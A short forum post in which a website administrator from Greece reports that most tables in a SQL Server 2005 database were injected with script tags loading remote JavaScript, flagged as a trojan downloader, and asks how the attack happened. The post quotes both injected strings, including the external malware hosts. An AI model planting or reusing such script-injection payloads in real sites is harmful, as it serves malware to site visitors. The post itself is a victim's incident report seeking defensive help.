Hello, i am a new member from Greece.
I am administrator of a website and recently i had two similar virus problems.
Suddenly before two weeks i found out that in many of the tables of my database (hosted in SQL server 2005) a great deal of records was filled in the end of many text fields with the string -- script src=http://www.lksr.ru/ngg.js>/script --
and after a week with string &"></title> script src="&chr(34)&"http://jjmaoduo.3322.org/csrss/w.js"&chr(34)&"> /script <!--.
That cause major problem when someone tried to see informations from database. Zonealarm was Quarantine the virus Trojan-Downloader.JS.Agent.ccv
I wrote some code to scan the database and to change the appearance of this string with an empty string and was cleaned.
I am trying to figure out how this happened and what to do to avoid it next time.
How anyone could have access to the database and added the strings in almost all the tables.
Thanks